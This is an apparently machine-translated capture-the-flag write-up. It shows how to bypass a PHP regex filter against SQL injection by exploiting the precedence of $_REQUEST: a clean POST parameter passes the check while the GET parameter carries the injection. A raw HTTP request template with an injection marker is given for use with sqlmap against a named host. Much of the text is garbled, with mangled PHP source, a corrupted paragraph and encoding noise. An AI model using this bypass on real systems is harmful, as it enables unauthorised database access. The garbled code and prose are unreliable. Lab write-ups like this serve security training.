PHP $_request writing anti-injection breakthrough

Scanner sweep to Robots.txt, visit: http://xxx.com/robots.txt

There is an admin, but access needs to enter the account number and password.

Attempt to access: Http://xxx.com/index.phps. Get the source code as follows:

<?phprequire_once ' lib.php '; header (' x-xss-protection:0 '); $cols = Array (    "e8c4-437b-9476",    " 849e-416e-acf7 ",    " 7f9d-470f-8698 ",    " C8bb-4695-93f7 ",    " 5fbc-4729-8821 ",    " 3ad3-46c3-b975 ",    " F44f-4cc9-a5e0 ",    " 0c3f-42c8-a0ae "    ), if (Isset ($_request[' id ')) {    if (Preg_match ("/"(?: \ w*) \w*? [A-z].* (r| Elect| oin| nto| here| nion) ($_request[' id ')) {die        ("Attack detected!!!");    }    $ad = Get_ad ($_get[' id ');    ? >    <HTML>    <HEAD>        <title>naughty ADS?1994</title>    </HEAD>    <body bgcolor= "White" >        <CENTER>        <?php echo $ad [' description ']? ><br/>        <a href= "/" >Home</a>        </CENTER>    </BODY>    </HTML>    <?php Die    ;}? >

　　

ForREQUEST[‘ID′]，IntoYesThe“StrictPane”OfIsTheHorseWith，NoYesIsOftenOfNoteOutNumber according to connect come pass request[' id′], the "strict" regular match, not the normal injection of data. Next, it is brought into the database by _get[' ID '] query and returns the result to the page.

Here is a survey of knowledge. $_request variable By default contains   G E T & #xFF0C; >Get get,_post and $_cookie. In the php.ini configuration file, there is a parameter Variables_order

Several of these letters (EGPCS) correspond to the following: Environment, Get, Post, Cookie, Server. The order in which these letters appear, indicates the order in which the data is loaded. From the three default configurations, the relative order is, that is, GP whenever a post parameter comes in, it overwrites the get parameter with the same name. such as

So in terms of the case, if you inject data at the Get parameter ID (such as union Select) and we pass the POST method to an ID parameter, the server detects harmless post data, and when the query is made it is harmful get data.

Save the following packet as Test.txt and run with Sqlmap:

POST/?id=* http/1.1host:naughtyads.alieni.seuser-agent:mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) gecko/20100101 firefox/48.0accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q= 0.8accept-language:zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3accept-encoding:gzip, Deflatednt:1connection: Closeupgrade-insecure-requests:1content-type:application/x-www-form-urlencodedcontent-length:18id= 0c3f-42c8-a0ae

　　

Get the account password, login http://xxxx.com/admin/555-31338 in the phone number, after submission to receive flag:

PHP $_request writing anti-injection breakthrough